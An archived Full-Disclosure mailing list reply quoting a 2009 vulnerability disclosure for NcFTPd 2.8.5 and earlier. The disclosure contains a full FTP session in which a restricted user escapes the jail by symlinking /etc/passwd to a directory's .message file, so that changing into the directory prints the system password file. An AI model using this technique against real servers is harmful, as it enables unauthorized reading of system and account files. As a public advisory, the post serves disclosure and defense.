lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 27 Jul 2009 15:55:22 -0400 From: Jeremy Brown <0xjbrown41@...il.com> To: Kingcope <kcope2@...glemail.com>, full-disclosure@...ts.grok.org.uk Subject: Re: NcFTPd <= 2.8.5 remote jail breakout You seem to be very forgetful lately kcope! But it is ok, because your research is always interesting. We forgive you :) On Mon, Jul 27, 2009 at 3:50 PM, Kingcope<kcope2@...glemail.com> wrote: > Hello list. > Just to clarify the NcFTPd vulnerability affects all operating systems > that NcFTPd runs on, > not just FreeBSD. > > Cheers, > > kcope > > > > 2009/7/27 Kingcope <kcope2@...glemail.com>: >> NcFTPd <= 2.8.5 remote jail breakout >> >> Discovered by: >> Kingcope >> Contact: kcope2<at>googlemail.com / http://isowarez.de >> >> Date: >> 27th July 2009 >> >> Greetings: >> Alex,Andi,Adize,wY!,Netspy,Revoguard >> >> Prerequisites: >> Valid user account. >> >> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version): >> >> # ftp 192.168.2.5 >> Connected to 192.168.2.5. >> 220 localhost NcFTPd Server (unregistered copy) ready. >> Name (192.168.2.5:root): kcope >> 331 User kcope okay, need password. >> Password: >> 230-You are user #1 of 50 simultaneous users allowed. >> 230- >> 230 Restricted user logged in. >> Remote system type is UNIX. >> Using binary mode to transfer files. >> ftp> get /etc/passwd passwd >> local: passwd remote: /etc/passwd >> 502 Unimplemented command. >> 227 Entering Passive Mode (192,168,2,5,219,171) >> 550 No such file. >> ftp> ls .. >> 227 Entering Passive Mode (192,168,2,5,218,102) >> 553 Permission denied. >> ftp> mkdir isowarez >> 257 "/isowarez" directory created. >> ftp> quote site symlink /etc/passwd isowarez/.message >> 250 Symlinked. >> ftp> cd isowarez >> 250-"/isowarez" is new cwd. >> 250- >> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ >> 250-# >> 250-root:*:0:0:Charlie &:/root:/bin/sh >> 250-toor:*:0:0:Bourne-again Superuser:/root: >> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin >> 250-operator:*:2:5:System &:/:/usr/sbin/nologin >> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin >> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin >> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin >> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin >> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin >> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin >> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin >> 250-smmsp:*:25:25:Sendmail Submission >> User:/var/spool/clientmqueue:/usr/sbin/nologin >> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin >> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin >> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin >> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin >> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin >> 250-uucp:*:66:66:UUCP >> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico >> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin >> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin >> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin >> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh >> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin >> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin >> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin >> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh >> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh >> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin >> 250-test:*:1003:1003:test:/home/test:/bin/sh >> 250-+testx:*:::::/bin/sh >> 250 >> ftp> >> >> +on freebsd you can symlink directories like ´/´ >> >> Cheerio, >> >> Kingcope >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists